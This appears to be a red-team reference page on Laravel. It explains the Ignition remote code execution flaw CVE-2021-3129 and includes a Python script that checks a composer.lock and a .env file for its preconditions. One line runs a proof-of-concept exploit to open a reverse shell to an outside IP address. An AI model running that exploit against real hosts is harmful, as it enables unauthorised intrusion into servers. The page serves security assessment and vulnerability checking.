Laravel
Laravel is a popular open-source PHP web framework designed to streamline the development of modern web applications. Built around the Model-View-Controller (MVC) architecture, it emphasizes clean syntax, modular code structure, and ease of use. Laravel comes bundled with tools for routing, database interaction, session handling, and authentication. It also includes a CLI tool called Artisan, which automates repetitive development tasks. Due to its widespread adoption and consistent structure, Laravel is frequently encountered during Red Team assessments, especially in environments using PHP for API backends, content platforms, or custom admin panels.
Unauthenticated RCE
Laravel applications (< v8.4.2) that ship the Ignition debugging package (< v2.5.2) are vulnerable to an unauthenticated remote code execution flaw (CVE-2021-3129) when debug mode is enabled (APP_DEBUG=true) and Ignition's routes are reachable over the web. Ignition registers a /_ignition/execute-solution endpoint that runs "solutions" for reported errors; one of them, MakeViewVariableOptionalSolution, passes the attacker-supplied viewFile parameter straight to file_get_contents() and file_put_contents() without validation. Using PHP stream wrappers (php://filter) in that parameter, an attacker can rewrite the application log into a controlled payload and then have it deserialised through the phar:// wrapper, which executes arbitrary PHP on the server. No credentials or session are required. Ignition is a require-dev dependency in the default Laravel skeleton, so the usual targets are development or staging instances, or production hosts that were deployed with dev dependencies and debug mode left on. A working PoC is available.
# Reverse shell
python3 exploit.py -i 192.168.45.170 -p 80 http://laravel-instance
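Before running a PoC against a host, it is worth confirming the three preconditions the flaw needs. The following is an added example (not code from the original page or from the Laravel/Ignition projects) that checks them offline from a composer.lock and a .env file, for instance ones recovered from a repository, a backup or an exposed .git directory. The version thresholds are the fixed releases from the advisory; the sample composer.lock and .env contents are constructed here for illustration.

```python
"""Offline preconditions check for CVE-2021-3129 (Laravel Ignition RCE).

Added example; not part of the original page or of Laravel/Ignition.
It reads a composer.lock and a .env file and reports whether the
conditions the vulnerability needs are present:
  - facade/ignition  < 2.5.2   (the decisive one: the vulnerable code lives here)
  - laravel/framework < 8.4.2  (informational: older skeletons pull in old Ignition)
  - APP_DEBUG=true             (Ignition's routes are only useful in debug mode)
"""
import json
import re
from typing import Dict, Optional, Tuple

FIXED_IGNITION = (2, 5, 2)   # first Ignition release with the fix
FIXED_FRAMEWORK = (8, 4, 2)  # first Laravel release that requires a fixed Ignition


def parse_version(v: str) -> Tuple[int, ...]:
    """Turn 'v2.4.1' or '8.4.2' into a comparable tuple of ints.

    Pre-release suffixes such as '-beta' are dropped, so '2.5.2-beta'
    compares as 2.5.2 (a conservative choice for a vulnerability check).
    """
    core = re.match(r"v?(\d+(?:\.\d+)*)", v.strip())
    if not core:
        raise ValueError(f"unparseable version: {v!r}")
    return tuple(int(p) for p in core.group(1).split("."))


def lock_versions(lock_text: str) -> Dict[str, str]:
    """Map package name -> installed version for every entry in a composer.lock.

    Both 'packages' and 'packages-dev' are read: in the default Laravel
    skeleton Ignition sits in require-dev, so 'packages-dev' is where it
    will appear on a dev or staging deployment.
    """
    data = json.loads(lock_text)
    versions: Dict[str, str] = {}
    for section in ("packages", "packages-dev"):
        for pkg in data.get(section, []):
            versions[pkg["name"]] = pkg["version"]
    return versions


def env_value(env_text: str, key: str) -> Optional[str]:
    """Return KEY's value from .env content, ignoring comments and quotes."""
    for line in env_text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        k, sep, v = line.partition("=")
        if sep and k.strip() == key:
            return v.strip().strip('"').strip("'")
    return None


def assess(lock_text: str, env_text: str) -> Dict[str, bool]:
    """Evaluate the CVE-2021-3129 preconditions and an overall verdict."""
    versions = lock_versions(lock_text)
    ignition = versions.get("facade/ignition")
    framework = versions.get("laravel/framework")
    debug = (env_value(env_text, "APP_DEBUG") or "false").lower()

    result = {
        "ignition_vulnerable": ignition is not None
        and parse_version(ignition) < FIXED_IGNITION,
        "framework_vulnerable": framework is not None
        and parse_version(framework) < FIXED_FRAMEWORK,
        "debug_enabled": debug in ("true", "1"),
    }
    # Exploitability hinges on a vulnerable Ignition plus debug mode; the
    # framework version only tells you which Ignition the lock file was
    # likely to resolve, so it is reported but not required.
    result["exploitable"] = result["ignition_vulnerable"] and result["debug_enabled"]
    return result


# Constructed sample inputs (not taken from any real deployment).
SAMPLE_LOCK = json.dumps({
    "packages": [{"name": "laravel/framework", "version": "v8.4.1"}],
    "packages-dev": [{"name": "facade/ignition", "version": "2.5.1"}],
})
SAMPLE_ENV = "APP_NAME=Laravel\nAPP_ENV=local\nAPP_DEBUG=true\n# APP_DEBUG=false\n"

if __name__ == "__main__":
    for key, value in assess(SAMPLE_LOCK, SAMPLE_ENV).items():
        print(f"{key:22s} {value}")
```

A "true" verdict here still needs confirming remotely: Ignition's routes can be disabled or restricted in the application, and a production build installed without dev dependencies will not contain the package at all even if the lock file lists it.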